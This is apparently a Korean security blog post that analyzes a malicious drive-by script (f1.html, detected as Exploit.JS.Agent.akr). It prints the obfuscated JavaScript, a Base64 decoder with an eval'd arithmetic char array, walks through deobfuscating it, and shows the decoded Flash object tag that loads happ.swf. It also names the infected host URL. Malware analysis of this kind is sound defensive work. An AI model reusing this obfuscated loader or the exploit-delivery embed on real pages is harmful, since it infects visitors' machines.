본문 바로가기

security/악성코드 유포

Decode Base 64 를 이용한 악성 스크립트!

File :

f1.html
MD5 :  bce75d05869be9fdf489d13630bab1f1
크기 : 8.67KB (8,879 바이트)
감염 사이트 : http://toto888.gnway.net:8080/xxx/f1.html
Kaspersky : Exploit.JS.Agent.akr
VirusTotal :
http://www.virustotal.com/file-scan/report.html?id=f811ce7544059f8123fdf5199e2abb29e8f4508dc9b58a761185779d96de2c12-1319253379
 
원본 코드

var a1 = "ABCDEFG";
var a2 = "HIJKLMNOP";
var a3 = "QRSTUVWXYZabcdef";
var keyStrs = a1+a2+a3+"ghijklmnopqrstuv"+"wxyz0123456789+/"+"=";
function mydata(input){
 var output="";
 var chr1,chr2,chr3="";
 var enc1,enc2,enc3,enc4="";
 var i=0;
 var base64test=/[^A-Za-z0-9\+\/\=]/g;
 input=input.replace(/[^A-Za-z0-9\+\/\=]/g,"");
 do{
  enc1=keyStrs.indexOf(input.charAt(i++));
  enc2=keyStrs.indexOf(input.charAt(i++));
  enc3=keyStrs.indexOf(input.charAt(i++));
  enc4=keyStrs.indexOf(input.charAt(i++));
  chr1=(enc1<<2)|(enc2>>4);
  chr2=((enc2&15)<<4)|(enc3>>2);
  chr3=((enc3&3)<<6)|enc4;
  output=output+String.fromCharCode(chr1);
  if(enc3!=64){output=output+String.fromCharCode(chr2);};
  if(enc4!=64){output=output+String.fromCharCode(chr3);};
  chr1=chr2=chr3="";
  enc1=enc2=enc3=enc4="";
 };
 while(i<input.length);return output;
 };
KT="2000 / 25 ,3905 / 55 ,60 - 3 ,106 - 1 ,189 - 92 ,206 - 97 ,31 + 55 ,19 + 87 ,1700 / 17 ,2211 / 33 ,117 - 51 ,114 - 8 ,44 + 54 ,39 + 32 ,52 + 18 ,173 - 51 ,96 + 3 ,85 - 35 ,137 - 29 ,4494 / 42 ,138 - 58 ,154 - 71 ,16 + 58 ,2438 / 23 ,6076 / 62 ,1368 / 19 ,14 + 64 ,224 - 112 ,28 + 62 ,6 + 62 ,9072 / 81 ,158 - 51 ,3003 / 39 ,193 - 87 ,8500 / 85 ,209 - 103 ,48 + 
[중간코드 생략] / 61 ,2670 / 30 ,7482 / 86 ,186 - 78 ,10296 / 88 ,5183 / 71 ,735 / 7 ,3510 / 54 ,4366 / 37 ,18 + 62 ,171 - 68 ,1632 / 34 ,88 - 13 ,131 - 51 ,91 - 24 ,3078 / 54 ,6726 / 57 ,153 - 64 ,57 + 52 ,94 + 18 ,126 - 18 ,96 - 7 ,96 - 45 ,405 / 5 ,65 - 22 ";
t=eval("mydata(String.fromCharCode("+KT+"))");
document.write(t);

Eavl 함수 실행 후

mydata(String.fromCharCode(="2000 / 25 ,3905 / 55 ,60 - 3 ,106 - 1 ,189 - 92 ,206 - 97 ,31 + 55 ,19 + 87 ,1700 / 17 ,2211 / 33 ,117 - 51 ,114 - 8 ,44 + 54 ,39 + 32 ,52 + 18 ,173 - 51 ,96 + 3 ,85 - 35 ,137 - 29 ,4494 / 42 ,138 - 58 ,154 - 71 ,16 + 58 ,2438 / 23 ,6076 / 62 ,1368 / 19 ,14 + 64 ,224 - 112 ,28 + 62 ,6 + 62 ,9072 / 81 ,158 - 51 ,3003 / 39 ,193 - 87 ,8500 / 85 ,209 - 103 ,48 + 
[중간코드 생략] / 61 ,2670 / 30 ,7482 / 86 ,186 - 78 ,10296 / 88 ,5183 / 71 ,735 / 7 ,3510 / 54 ,4366 / 37 ,18 + 62 ,171 - 68 ,1632 / 34 ,88 - 13 ,131 - 51 ,91 - 24 ,3078 / 54 ,6726 / 57 ,153 - 64 ,57 + 52 ,94 + 18 ,126 - 18 ,96 - 7 ,96 - 45 ,405 / 5 ,65 - 22 ";)


mydata ~> Alert 변경후 실행 !

---------------------------
Microsoft Internet Explorer
---------------------------
PG9iamVjdCBjbGFzc2lkPSJjbHNpZDpkMjdjZGI2ZS1hZTZkLTExY2YtOTZiO
C00NDQ1NTM1NDAwMDAiIA0Kd2lkdGg9IjIwMCIgaGVpZ2h0PSIxMDAiIGlkP
SJ0ZXN0IiBhbGlnbj0ibWlkZGxlIj4NCjxwYXJhbSBuYW1lPSJtb3ZpZSIgdmFs
[중간코드 생략]bHVlPSJ0cnVlIiAvPg0KPHBhcmFtIG5hbWU9ImRldmljZWZvbnQiIHZhbHVlPSJ
mYWxzZSIgLz4NCjxwYXJhbSBuYW1lPSJzYWxpZ24iIHZhbHVlPSIiIC8+DQo8
cGFyYW0gbmFtZT0iYWxsb3dTY3JpcHRBY2Nlc3MiIHZhbHVlPSJzYW1lRG9tY
WluIiAvPg0KPC9vYmplY3Q+
---------------------------
확인  
---------------------------


Decode Base 64

<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"
width="200" height="100" id="test" align="middle">
<param name="movie" value="happ.swf?
info=02E631B5B1353336AB51D3527B7A6FAE7986" />
<param name="quality" value="high" />
<param name="bgcolor" value="#ffffff" />
<param name="play" value="true" />
<param name="loop" value="true" />
<param name="wmode" value="window" />
<param name="scale" value="showall" />
<param name="menu" value="true" />
<param name="devicefont" value="false" />
<param name="salign" value="" />
<param name="allowScriptAccess" value="sameDomain" />
</object>